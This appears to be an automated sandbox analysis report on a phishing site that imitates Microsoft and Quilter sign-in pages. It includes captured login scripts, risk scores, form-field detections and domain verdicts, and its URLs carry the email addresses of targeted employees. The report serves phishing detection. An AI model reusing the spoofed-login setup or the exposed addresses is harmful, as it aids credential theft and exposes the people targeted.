ix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe3c3jGlLt8REDH67TwrGDdUTOsN9O_vYK4x5enzRAaUJGjfer370-REyL-zwkOnGIOurv5S4Cf6iED50QgomCp_WKo7Jjz0_QmP5mS_HBKpeoOyskE7V0RdgmMGmMNdeT4n8SFuNGyq96pp7nSyk6ID7STXTxmDt0-Kju8jGWMytIc8bW27eNQXRwDPkit564T3ra9j6iJmLH0I31lF_50SAA","canary":"YesUvMnqIEj9k4ykR6rN94EZxjQHY2BXgymG7c4NbCY=9:1:CANARY:lUDMx21d/qjOQcKeA7K/jYyWJ8Sd5Lmg21OEgCcUtjw=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"fce047cb-be44-4baf-b341-dd18251b7c6b","sessionId":"f7ff96ad-cf4e-429c-a41b-c460f4393700","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://accounts.lccweb.org/common/instrumentation/reportpageload","dssostatus":"https://accounts.lccweb.org/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://7981e0f9-3f043121.lccweb.org/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://7981e0f9-3f043121.lccweb.org/ests/2.1/content/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js","fbundle":"https://7981e0f9-3f043121.lccweb.org/ests/2.1/content/cdnbu |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The script contains legacy practices such as using outdated event handling methods like attachEvent and detachEvent, which are considered low-risk indicators. There is no evidence of dynamic code execution, data exfiltration, or interaction with suspicious domains. The script appears to be focused on logging and event handling, which aligns with typical analytics or telemetry functionality."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://7981e0f9-3f043121.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is benign and focused on providing a consistent Promise implementation across different browsers. There are no clear indicators of malicious intent or data exfiltration, so the risk score is relatively low."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)i=o[s],Object.prototype.hasOwnProperty.call(a,i)&&a[i]&&c.push(a[i][0]),a[i]=0;for(t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t]);for(d&&d(n);c.length;)c.shift()()}var t,i={},a={24:0};function o(n){if(i[n])return i[n].exports;var t=i[n]={i:n,l:!1,exports:{}};return e[n].call(t.exports,t,t.exports,o),t.l=!0,t.exports}Function.prototype.bind||(t=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var n=t.call(arguments,1),i=n.length,a=this,o=function(){},r=function(){return n.length=i,n.push.apply(n,arguments),a.apply(o.prototype.isPrototypeOf(this)?this:e,n)};return this.prototype&&(o.prototype=this.prototype),r.prototype=new o,r}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(n){var t=this,i=0,a=null,o=[];function r(){if(o.length>0){var e=o.slice();o=[],setTimeout((function(){for(var n=0,t=e.length;n<t;++n)e[n]()}),0)}}function s(e){0===i&&(a=e,i=1,r())}function c(e){0===i&&(a=e,i=2,r())}t.then=function(n,t){return new e((function(s,c){!function(n,t,s,c){o.push((function(){var o;try{o=1===i?"function"==typeof n?n(a):a:"function"==typeof t?t(a):a}catch(r){return void c(r)}o instanceof e?o.then(s,c):2===i&&"function"!=typeof t?c(o):s(o)})),0!==i&&r()}(n,t,s,c)}))},t["catch"]=function(e){return t.then(null,e)},function(){if("function"!=typeof n)throw new TypeError("Promise: argument is not a Function object");try{n(s,c)}catch(e){c(e)}}()}function n(e,n,t,i,a){return function(o){e[n]=i?o:a?{status:"fulfilled",value:o}:{status:"rejected",reason:o},t()}}function t(t,i){return t&&t.length?new e((function(a,o){for(var r=[],s=0,c=0,d=t.length;c<d;++c){var l=t[c];if(l instanceof e){s++;var u=function(){0==--s&&a(r)};i?l.then(n(r,c,u,i),o):l.then(n(r,c,u,i,!0),n(r,c,u,i,!1))}else 
r[c]=l}0===s&&setTimeout((function(){a(r)}),0)})):e.resolve([])}function i(e,n){return function(){e(n)}}e.all=function(e){return t(e,!0)},e.allSettled=function(e){return t(e,!1)},e.race=function(n){return new e((function(t,a){if(n&&n.length)for(var o=0,r=n.length;o<r;++o){var s=n[o];s instanceof e?s.then(t,a):setTimeout(i(t,s),0)}}))},e.reject=function(n){return new e((function(e,t){t(n)}))},e.resolve=function(n){return n instanceof e?n:n&&"function"==typeof n.then?new e((function(e,t){n.then(e,t)})):new e((function(e){e(n)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),o.e=function(e){var n=[],t=a[e];if(0!==t)if(t)n.push(t[2]);else{var i=new Promise((function(n,i){t=a[e]=[n,i]}));n.push(t[2]=i);var r=window.ServerData,s=r&&r.loader&&r.loader.cdnRoots||[],c=r&&r.slMaxRetry?r.slMaxRetry:s.length-1,d=new Error;var l=function u(n |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates moderate-risk behaviors, including redirecting the user to a potentially untrusted domain and modifying the URL with query parameters. While the intent is not entirely clear, the script's behavior raises concerns and requires further investigation."
} |
//<![CDATA[
// Frame-handling stub captured from the page: an IIFE that reads window,
// window.document and window.$Config (falling back to {}).
//
// - `if(true)`: the condition is a literal, so this is the only branch that runs.
//   It sets document.body.style.display to "block" when document and body exist.
// - `else if(false)`: unreachable as captured. If it ran, it would take the
//   frame's own URL (self.location.href), insert
//   "iframe-request-id=" + $Config.sessionId before any "#" fragment
//   (or at the end of the URL when there is none), and assign the result to
//   top.location. The separator is "?" when the URL has no "?" ahead of the
//   fragment, otherwise "&".
// - $Config.fAddTryCatchForIFrameRedirects only selects whether that assignment
//   is wrapped in a try/catch that swallows the error; both arms build the same URL.
//
// NOTE(review): the literal true/false conditions look like server-side template
// output — confirm against the original page. With these values the snippet
// performs no navigation, and the dead branch targets the page's own URL rather
// than a different host.
!function(){var e=window,s=e.document,i=e.$Config||{};if(true){s&&s.body&&(s.body.style.display="block")}else if(false){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",
o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}();
//
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Trying to sign you in",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://7981e0f9-3f043121.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI |
{
"risk_score": 3,
"reasoning": "The script uses aggressive DOM manipulation and external data transmission without transparency, but it does not exhibit high-risk behaviors like dynamic code execution or data exfiltration. The context suggests it is part of a legitimate third-party library, which reduces the risk score."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/
(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(539).concat([function(t,e,r){var n=r(2),o=r(22),i=r(0),s=r(5),u=r(1018),a=r(3).Array,c=i.StringCustomizationPageId;t.exports=function(t){var e=this,r=t.serverData,f=t.pageId;function l(t){return function(t){var e=0,n=r.slMaxRetry||0;if(!t)return s.reject();return new s((function(r,s){var u={targetUrl:t,contentType:i.ContentType.Json,requestType:o.RequestType.Get,timeout:3e4,successCallback:function(t,e){r(e)},failureCallback:function(t){e<n?(e+=1,new o.Handler(u).sendRequest()):s(t)}};new o.Handler(u).sendRequest()}))}(t).then((function(t){return JSON.parse(t)}),(function(){e.strings.isLoadFailure(!0)}))}e.customCssLoader=new u,e.strings=n.observable({}),e.strings.isLoadComplete=n.observable(!1),e.strings.isLoadFailure=n.observable(!1),e.isLoadComplete=n.observable(!1),e.isLoadFailure=n.observable(!1),e.initialize=function(){},e.load=function(t){var r,n=[],o=[];return t.customStringsFiles&&function(t,r){var n=[];switch(f){case c.ConditionalAccess:t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.AttributeCollection:t.attributeCollection&&n.push(t.attributeCollection);break;case c.ProofUpPage:t.authenticatorNudgeScreen&&n.push(t.authenticatorNudgeScreen),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.ErrorPage:t.adminConsent&&n.push(t.adminConsent),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.LoginPage:t.attributeCollection&&n.push(t.attributeCollection);break;case c.MessagePage:}var o=n.length;if(o)for(var i=0;i<o;i++)r.push(l(n[i]));else e.strings.isLoadComplete(!0)}(t.customStringsFiles,o),t.customCss&&n.push((r=t.customCss,e.customCssLoader.loadAsync(r))),s.allSettled(o).then((function(t){var r=[];a.forEach(t,(function(t){t&&"fulfilled"===t.status&&t.value&&(r=r.concat(t.value))})),e.strings(r),e.strings.isLoadComplete(!0)})),s.allSettled(n.concat(o)).then((function(){e.isLoadComplete(!0)})),s.all(n)["catch"]((function(t){throw 
e.isLoadFailure(!0),t}))}}},,,function(t,e,r){"use strict";var n=r(545),o=r(570).f,i=r(571),s=r(561),u=r(742),a=r(635),c=r(637);t.exports=function(t,e){var r,f,l,h,p,d=t.target,y=t.global,v=t.stat;if(r=y?n:v?n[d]||u(d,{}):n[d]&&n[d].prototype)for(f in e){if(h=e[f],l=t.dontCallGetSet?(p=o(r,f))&&p.value:r[f],!c(y?f:d+(v?".":"#")+f,t.forced)&&l!==undefined){if(typeof h==typeof l)continue;a(h,l)}(t.sham||l&&l.sham)&&i(h,"sham",!0),s(r,f,h,t)}}},function(t,e,r){"use strict";t.exports=function(t){try{return!!t()}catch(e){return!0}}},function(t,e,r){"use strict";var n=r(633),o=Function.prototype,i=o.call,s=n&&o.bind.bind(i,i);t.exports=n?s:function(t){return function(){return i.apply(t,arguments)}}},function(t,e,r){"use strict";(function(e){var r=function(t){return t&&t.Math===Math&&t};t.exports=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof e&&e)||r("object"==typeof this&&this)||function(){return this}()||Function("return this")()}).call(this,r(40))},function(t,e,r){"use strict";var n=r(543);t.exports=!n((func |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Quilter"
]
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | { "legit_domain": "quilter.com", "classification": "known", "reasons": [ "The brand 'Quilter' is a known financial services company.", "The URL 'accounts.lccweb.org' does not match the legitimate domain 'quilter.com'.", "The domain 'lccweb.org' does not have any known association with the brand 'Quilter'.", "The presence of a password input field on a non-legitimate domain is suspicious.", "The URL structure does not include any direct reference to 'Quilter', which is a red flag." ], "riskscore": 8}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Quilter
Input Fields: Password |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Trying to sign you in",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"tim.twat@quilter.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "This username may be incorrect. Make sure you typed it correctly. Otherwise, contact your admin.",
"prominent_button_name": "Next",
"text_input_field_labels": [
"tim.twat@quilter.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'accounts.lccweb.org' does not match the legitimate domain for Microsoft.", "The domain 'lccweb.org' does not have any known association with Microsoft.", "The use of a subdomain 'accounts' is common in phishing attempts to mimic legitimate login pages.", "The domain 'lccweb.org' could be a legitimate domain for another entity, but it is not related to Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Microsoft
Input Fields: tim.twat@quilter.com |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'accounts.lccweb.org' does not match the legitimate domain for Microsoft.", "The domain 'lccweb.org' does not have any known association with Microsoft.", "The presence of a subdomain 'accounts' is common in phishing attempts to mimic legitimate login pages.", "The domain 'lccweb.org' could be a legitimate domain for another entity, but it is not related to Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Microsoft
Input Fields: tim.twat@quilter.com |
URL: https://lccweb.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://lccweb.org |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x&timestamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|